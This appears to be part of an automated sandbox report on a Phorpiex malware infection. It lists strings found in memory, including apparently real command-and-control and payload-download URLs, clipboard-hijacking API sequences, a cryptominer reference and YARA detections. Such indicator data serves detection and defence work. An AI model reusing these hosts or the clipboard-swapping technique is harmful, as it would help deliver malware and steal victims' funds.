Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/21
Source: sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/2:
Source: sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/3
Source: sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4
Source: sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4&
Source: sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/41
Source: sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/46/4sysmain.sdp
Source: sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4S
Source: sysppvrdnvs.exe, 00000006.00000003.1804997304.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4T
Source: sysppvrdnvs.exe, 00000023.00000003.2306001525.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/4e
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/5
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/5&
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/5C:
Source: sysppvrdnvs.exe, 00000006.00000002.1963842590.0000000002E9C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/5H
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/5S
Source: sysppvrdnvs.exe, 00000023.00000003.2087179391.00000000005CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/S
Source: 1706633239.exe, 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1706633239.exe, 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 446629599.exe, 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
Source: T52Z708x2p.exe, 00000001.00000003.1397284019.0000000000482000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398181396.0000000000485000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397284019.000000000049E000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1397948422.0000000000146000.00000004.00000010.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398060656.0000000000421000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000478000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398120886.0000000000434000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398120886.0000000000478000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000002.1398181396.000000000049E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/pei.exe
Source: T52Z708x2p.exe, 00000001.00000002.1398060656.0000000000421000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/pei.exeDl
Source: T52Z708x2p.exe, 00000001.00000002.1398120886.0000000000434000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/pei.exeTTC:
Source: T52Z708x2p.exe, 00000001.00000002.1398120886.0000000000434000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.66/pei.exeumpe
Source: 281653412.exe, 0000001B.00000002.1811913395.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, 281653412.exe, 0000001B.00000000.1771013149.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://185.215.113.66/reg.php?s=%s
Source: 281653412.exe, 0000001B.00000002.1811913395.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, 281653412.exe, 0000001B.00000000.1771013149.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://185.215.113.66/reg.php?s=%sMozilla/5.0
Source: sysppvrdnvs.exe	String found in binary or memory: http://185.215.113.66/tdrp.exe
Source: 1706633239.exe, 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1706633239.exe, 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 446629599.exe, 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c
Source: 1332331323.exe, 0000001D.00000002.1982106656.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, 1332331323.exe, 0000001D.00000002.1982106656.0000000001602000.00000004.00000020.00020000.00000000.sdmp, 65841553.exe	String found in binary or memory: http://185.215.113.84/nxmr.exe
Source: 1332331323.exe, 0000001D.00000002.1982106656.0000000001602000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.84/nxmr.exeOE
Source: 1332331323.exe, 0000001D.00000000.1855553229.0000000000952000.00000002.00000001.01000000.0000000C.sdmp, 1332331323.exe, 0000001D.00000002.1981792308.0000000000952000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://185.215.113.84/nxmr.exeP0
Source: 1332331323.exe, 0000001D.00000002.1982106656.0000000001602000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.84/nxmr.exeystem32
Source: 1706633239.exe, 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, 1706633239.exe, 00000005.00000000.1450900740.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1706633239.exe, 00000005.00000002.1484354492.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000006.00000000.1473803939.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000002.1610696974.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000013.00000000.1588390233.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 446629599.exe, 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986636602.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, 446629599.exe, 00000021.00000002.1986738654.000000000057E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000000.1976145001.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000000.2150937536.0000000000410000.00000002.00000001.01000000.00000010.sdmp, sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://91.202.233.141/
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/1(
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/1e
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/2
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/3
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/4
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/4&
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/4y
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2637160911.000000000357B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/5
Source: 2311326414.exe, 00000020.00000002.1991439592.000000000144F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/8
Source: 2311326414.exe, 00000020.00000002.1991439592.000000000144F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/ALLBSTATAASASD
Source: 2311326414.exe, 00000020.00000002.1991439592.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/ALLBSTATAASASD&
Source: 2311326414.exe, 00000020.00000002.1991439592.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/ALLBSTATAASASD/sN
Source: 2311326414.exe, 00000020.00000002.1991439592.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/ALLBSTATAASASD00
Source: 2311326414.exe, 00000020.00000002.1991439592.0000000001419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/ALLBSTATAASASD7s&
Source: 2311326414.exe, 00000020.00000000.1940403139.00000000007A2000.00000002.00000001.01000000.0000000D.sdmp, 2311326414.exe, 00000020.00000002.1991188613.00000000007A2000.00000002.00000001.01000000.0000000D.sdmp, sysppvrdnvs.exe, 00000023.00000002.2636883444.00000000033D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/ALLBSTATAASASDMozilla/5.0
Source: 281653412.exe, 0000001B.00000002.1811913395.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, 281653412.exe, 0000001B.00000000.1771013149.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://91.202.233.141/TLOADEDBROMozilla/5.0
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/der
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1963486595.0000000002CCD000.00000004.00000010.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1960938007.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000006.00000002.1963772224.0000000002D93000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000023.00000002.2636322759.0000000002E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/dwntbl
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/dwntblONTD~1
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/dwntblk
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/dwntblli
Source: sysppvrdnvs.exe, 00000006.00000002.1960245880.0000000000588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/sg
Source: sysppvrdnvs.exe, 00000023.00000002.2630132589.0000000000577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/tography
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: T52Z708x2p.exe, 00000001.00000000.1378846199.00000001400A2000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: T52Z708x2p.exe, 00000001.00000000.1378846199.00000001400A2000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://s.symcd.com06
Source: sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp, powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: sysppvrdnvs.exe, 00000034.00000002.2171612447.0000000000410000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: powershell.exe, 0000002E.00000002.2067077461.000002949F531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2204457106.0000021D2AD41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000002E.00000002.2067077461.000002949F759000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: T52Z708x2p.exe, 00000001.00000000.1378846199.00000001400A2000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: T52Z708x2p.exe, 00000001.00000000.1378846199.00000001400A2000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: T52Z708x2p.exe, 00000001.00000000.1378846199.00000001400A2000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 70AF.exe, 00000004.00000002.1497197791.000000000092A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/
Source: 70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/.C
Source: 70AF.exe, 00000004.00000002.1497197791.0000000000952000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000002.1497197791.000000000092A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.exe
Source: T52Z708x2p.exe, 00000001.00000003.1397236158.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp, 70AF.exe, 00000004.00000000.1396259523.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://twizt.net/newtpp.exeP0
Source: 70AF.exe, 00000004.00000002.1497197791.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.exel
Source: 70AF.exe, 00000004.00000002.1497197791.0000000000952000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000000.1396259523.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://twizt.net/peinstall.php
Source: T52Z708x2p.exe, 00000001.00000003.1397236158.00000000004A5000.00000004.00000020.00020000.00000000.sdmp, T52Z708x2p.exe, 00000001.00000003.1397326260.0000000000432000.00000004.00000020.00020000.00000000.sdmp, 70AF.exe, 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp, 70AF.exe, 00000004.00000000.1396259523.0000000000AF2000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: http://twizt.net/peinstall.php%temp%%s
Source: 70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.php/peinstall.phpshqos.dll.mui
Source: 70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.php6R
Source: 70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpBU
Source: 70AF.exe, 00000004.00000002.1497197791.0000000000952000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpCx
Source: 70AF.exe, 00000004.00000002.1497197791.0000000000940000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpoU_
Source: powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000002E.00000002.2067077461.000002949F531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2204457106.0000021D2AD41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: T52Z708x2p.exe, 00000001.00000000.1378846199.00000001400A2000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: T52Z708x2p.exe, 00000001.00000000.1378846199.00000001400A2000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: T52Z708x2p.exe, 00000001.00000000.1378846199.00000001400A2000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 0000003C.00000002.2204457106.0000021D2AF69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000002E.00000002.2096216793.00000294AF59C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: winupsecvmgr.exe, 00000033.00000002.2319595860.00007FF75CFDB000.00000004.00000001.01000000.00000014.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

Code function: 5_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_00404970

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe	Code function: 5_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_00404970
Source: C:\Windows\sysppvrdnvs.exe	Code function: 6_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	6_2_00404970
Source: C:\Windows\sysppvrdnvs.exe	Code function: 19_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	19_2_00404970

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

Code function: 5_2_004059B0 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,

5_2_004059B0

Source: C:\Users\user\AppData\Local\Temp\1706633239.exe

5_2_004059B0

Spam, unwanted Advertisements and Ransom Demands

Yara detected Phorpiex

Source: Yara match	File source: 35.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.1706633239.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.446629599.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.1706633239.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 52.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 48.0.sysppvrdnvs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.446629599.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1484456893.000000000053E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.1949731068.0000000000410000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2627233365.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.2090805387.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1966173412.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000000.2069869412.0000000000410000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
